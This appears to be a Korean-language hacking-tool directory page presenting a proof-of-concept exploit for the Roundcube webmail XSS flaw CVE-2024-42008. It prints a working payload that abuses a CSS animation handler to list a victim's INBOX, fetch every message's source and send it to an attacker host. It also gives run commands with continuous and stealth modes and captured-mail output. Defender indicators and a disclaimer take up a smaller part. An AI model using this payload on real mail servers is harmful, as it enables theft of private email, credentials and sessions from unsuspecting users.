Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Roundcube-CVE-2024-42008-POC | Kitploit
도구/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPhishingCTFLearning & Education
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-42008 RoundCube XSS 익스플로잇

개요

이 저장소는 RoundCube 웹메일 애플리케이션의 XSS(Cross-Site Scripting) 취약점인 CVE-2024-42008에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이 익스플로잇은 교육 목적과 HackTheBox와 같은 통제된 침투 테스트 환경을 위해 설계되었습니다.

취약점 상세

CVE-2024-42008 요약

  • CVE ID: CVE-2024-42008
  • 유형: 크로스 사이트 스크립팅(XSS)
  • CVSS 점수: 높음
  • 영향받는 버전:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • 수정된 버전: 1.5.8, 1.6.8+

기술적 세부 사항

이 취약점은 rcmail_action_mail_get->run()에 존재하며, 원격 공격자가 피해자의 브라우저에서 임의의 JavaScript를 실행할 수 있게 합니다. 이 결함은 이메일 콘텐츠를 처리할 때 입력 검증이 충분하지 않기 때문에 발생하며, 특히 CSS 애니메이션 및 JavaScript 실행 컨텍스트 처리에서 문제가 됩니다.

주요 공격 벡터:

  • 연락처 양식 또는 이메일 메시지를 통해 주입된 악성 HTML 콘텐츠
  • JavaScript 실행을 트리거하는 데 사용되는 CSS 애니메이션 속성
  • onanimationstart 이벤트 핸들러가 콘텐츠 필터를 우회
  • JavaScript 페이로드가 웹메일 애플리케이션의 컨텍스트에서 실행

영향

성공적인 익스플로잇을 통해 공격자는 다음을 수행할 수 있습니다:

  • 피해자의 이메일 탈취 (INBOX 및 기타 폴더에서)
  • 이메일 메타데이터 유출 (UID, 메시지 목록)
  • 이메일 원본 코드 및 첨부 파일에 접근
  • 피해자 계정으로 이메일 발송
  • 로그인 자격 증명 및 세션 토큰 수집
  • 피해자를 대신하여 작업 수행

익스플로잇 스크립트 분석

스크립트 구조

이 익스플로잇은 세 가지 주요 구성 요소로 이루어져 있습니다:

  1. XSS 페이로드 전달: 연락처 양식을 통해 악성 HTML 전송
  2. HTTP 서버: 유출된 데이터 수신 대기
  3. 데이터 처리: 탈취한 이메일 캡처 및 로깅

페이로드 분석

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

주요 기능

  • 연속 작동: 정기적인 간격으로 페이로드 전송 가능
  • 스텔스 모드: 최소한의 발자국과 오류 처리
  • 데이터 로깅: 유출된 이메일 자동 캡처 및 저장
  • 디버그 모드: 트래픽 분석을 위한 프록시 지원
  • 구성 가능: 다양한 명령줄 옵션

사용법

사전 요구 사항

root@kitploit:~
pip install requests

기본 사용법

root@kitploit:~
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d

설정

스크립트를 편집하여 다음을 구성하세요:

  • ATTACKER_IP: 공격자 수신 서버 IP
  • ATTACKER_PORT: 유출된 데이터를 수신하는 포트
  • RECIPIENT_EMAIL: 대상 이메일 주소
  • TARGET_URL: 취약한 RoundCube 인스턴스
  • PROXY: 디버깅용 프록시 서버 (Burp Suite/Caido)

명령줄 옵션

옵션설명
-d, --debug프록시 지원 디버그 모드 활성화
-c, --continuous페이로드를 연속적으로 전송
-i, --interval페이로드 간 간격 (기본값: 30초)

공격 흐름

  1. 페이로드 주입: 스크립트가 연락처 양식을 통해 악성 HTML 전송
  2. 이메일 전달: 취약한 RoundCube가 이메일을 처리하고 전달
  3. 피해자 상호작용: 사용자가 악성 이메일을 열람/확인
  4. XSS 실행: CSS 애니메이션이 JavaScript 페이로드 트리거
  5. 데이터 유출: JavaScript가 이메일을 탈취하여 공격자에게 전송
  6. 데이터 캡처: 익스플로잇 서버가 탈취된 데이터를 수신하고 로깅

탐지 및 완화

방어자를 위한 안내

탐지 지표:

  • 이메일 콘텐츠의 비정상적인 CSS 애니메이션 속성
  • HTML의 onanimationstart 이벤트 핸들러
  • 이메일 메시지의 의심스러운 JavaScript
  • 웹메일에서 알 수 없는 도메인으로의 외부 요청
  • 반복적인 연락처 양식 제출

완화 전략:

  • RoundCube를 버전 1.5.8 또는 1.6.8+로 업데이트
  • CSP(Content Security Policy) 구현
  • 이메일 콘텐츠 필터링 활성화
  • 의심스러운 외부 트래픽 모니터링
  • 웹메일 구성에 대한 정기적인 보안 감사

침투 테스터를 위한 안내

테스트 고려 사항:

  • 테스트 전 적절한 권한 확인
  • 보고를 위한 모든 활동 문서화
  • 격리된 환경에서만 테스트
  • 대상이 의도적으로 취약한지 확인
  • 책임 있는 공개 절차 준수

법적 및 윤리적 고려 사항

⚠️ 경고: 이 익스플로잇은 교육 목적 및 승인된 테스트 용도로만 제공됩니다.

  • 소유한 시스템 또는 테스트에 대한 명시적 허가가 있는 시스템에서만 사용
  • HackTheBox 및 유사한 학습 플랫폼을 위해 설계됨
  • 무단 사용은 현지 및 국제 법률을 위반할 수 있음
  • 항상 책임 있는 공개 절차를 준수
  • 개인정보 보호 및 데이터 보호 규정 준수

기술 참고 자료

  • CVE-2024-42008 공식 항목
  • RoundCube 보안 권고
  • CWE-79: 크로스 사이트 스크립팅

출력 예시

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

면책 조항

이 코드는 교육 목적 및 승인된 침투 테스트 용도로만 제공됩니다. 저자는 이 소프트웨어로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 권한이 있는지 확인하세요.

도구 다운로드